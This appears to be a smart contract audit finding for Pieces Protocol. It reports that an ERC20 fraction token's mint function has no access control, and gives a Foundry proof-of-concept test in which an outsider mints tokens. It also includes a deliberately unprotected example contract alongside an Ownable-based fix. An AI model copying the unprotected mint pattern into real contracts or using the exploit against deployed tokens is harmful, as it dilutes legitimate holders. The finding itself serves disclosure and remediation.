Pieces Protocol

First Flight #32
Tags: Beginner Friendly, Foundry, Solidity, NFT
Submission Details
Severity: high
Valid

`ERC20ToGenerateNftFraccion::mint` has no access control, allowing anyone to mint tokens

Description

The `ERC20ToGenerateNftFraccion::mint` function has no admin or `onlyOwner` protection, so it can be called by any address, not only by the contract that created the token.

Impact

This issue allows anyone to mint an arbitrary amount of the ERC20 fraction tokens that represent a divided NFT, diluting the holders who received their fractions through the intended `divideNft` flow.

Proof of Concept

Add the following test to `TokenDividerTest.t.sol`:

```solidity
function testERC20MintFunctionHasNoAdminProtection() public {
    // USER divides the NFT through the intended flow and receives AMOUNT fraction tokens
    vm.startPrank(USER);
    erc721Mock.approve(address(tokenDivider), TOKEN_ID);
    tokenDivider.divideNft(address(erc721Mock), TOKEN_ID, AMOUNT);
    vm.stopPrank();

    // Look up the ERC20 that TokenDivider created for this NFT
    ERC20Mock erc20Mock = ERC20Mock(tokenDivider.getErc20InfoFromNft(address(erc721Mock)).erc20Address);

    // A random user is able to mint the erc20Mock tokens
    vm.startPrank(USER2);
    erc20Mock.mint(USER2, AMOUNT);
    vm.stopPrank();

    // USER2 now holds as many fraction tokens as the legitimate holder
    assertEq(erc20Mock.balanceOf(USER), erc20Mock.balanceOf(USER2));
}
```

Tools Used

  • Foundry, Manual analysis

Recommended mitigation

Import the `Ownable` contract from OpenZeppelin and restrict `mint` with an `onlyOwner` modifier, so that only the owner set at deployment can create new fraction tokens.
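The weak pattern next to the recommended fix, as an added illustration that is not the Pieces Protocol code. Contract names (`UnprotectedFraction`, `OwnedFraction`, `FractionMintAccessTest`) are hypothetical, and the example assumes OpenZeppelin Contracts v5 (where `Ownable` takes the initial owner as a constructor argument) together with forge-std for the test.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited project's code. Assumes OpenZeppelin Contracts v5.
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
import {Test} from "forge-std/Test.sol";

/// Weak form: the pattern the finding describes. `mint` has no modifier, so any
/// address can inflate the supply of fraction tokens.
contract UnprotectedFraction is ERC20 {
    constructor(string memory name_, string memory symbol_) ERC20(name_, symbol_) {}

    function mint(address to, uint256 amount) external {
        _mint(to, amount);
    }
}

/// Hardened form: only the owner fixed at deployment may mint. When the token is
/// deployed by the divider contract, `msg.sender` in the constructor is that
/// contract, so passing it to `Ownable` makes the divider the sole minter.
contract OwnedFraction is ERC20, Ownable {
    constructor(string memory name_, string memory symbol_)
        ERC20(name_, symbol_)
        Ownable(msg.sender)
    {}

    function mint(address to, uint256 amount) external onlyOwner {
        _mint(to, amount);
    }
}

/// Foundry test showing the open mint on the weak form and the revert on the fix.
contract FractionMintAccessTest is Test {
    address deployer = makeAddr("deployer"); // constructed test address
    address outsider = makeAddr("outsider"); // constructed test address
    uint256 constant AMOUNT = 1_000e18;

    function testUnprotectedMintIsOpenToAnyone() public {
        UnprotectedFraction weak = new UnprotectedFraction("Fraction", "FRAC");

        // An unrelated address mints to itself without any authorisation check
        vm.prank(outsider);
        weak.mint(outsider, AMOUNT);
        assertEq(weak.balanceOf(outsider), AMOUNT);
    }

    function testOwnedMintRejectsNonOwner() public {
        // `new` runs under the prank, so `deployer` becomes the owner
        vm.prank(deployer);
        OwnedFraction safe = new OwnedFraction("Fraction", "FRAC");

        // Non-owner call reverts with OZ v5's custom error
        vm.prank(outsider);
        vm.expectRevert(
            abi.encodeWithSelector(Ownable.OwnableUnauthorizedAccount.selector, outsider)
        );
        safe.mint(outsider, AMOUNT);
        assertEq(safe.balanceOf(outsider), 0);

        // The owner can still mint as intended
        vm.prank(deployer);
        safe.mint(deployer, AMOUNT);
        assertEq(safe.balanceOf(deployer), AMOUNT);
    }
}
```

Run with `forge test --match-contract FractionMintAccessTest`. The second test is the regression check to keep after applying the fix: it pins both the revert for outsiders and the continued ability of the legitimate owner to mint.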

Updates

Lead Judging Commences

fishy Lead Judge 8 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Lack of token access control checks

Any person can mint the ERC20 token generated in representation of the NFT
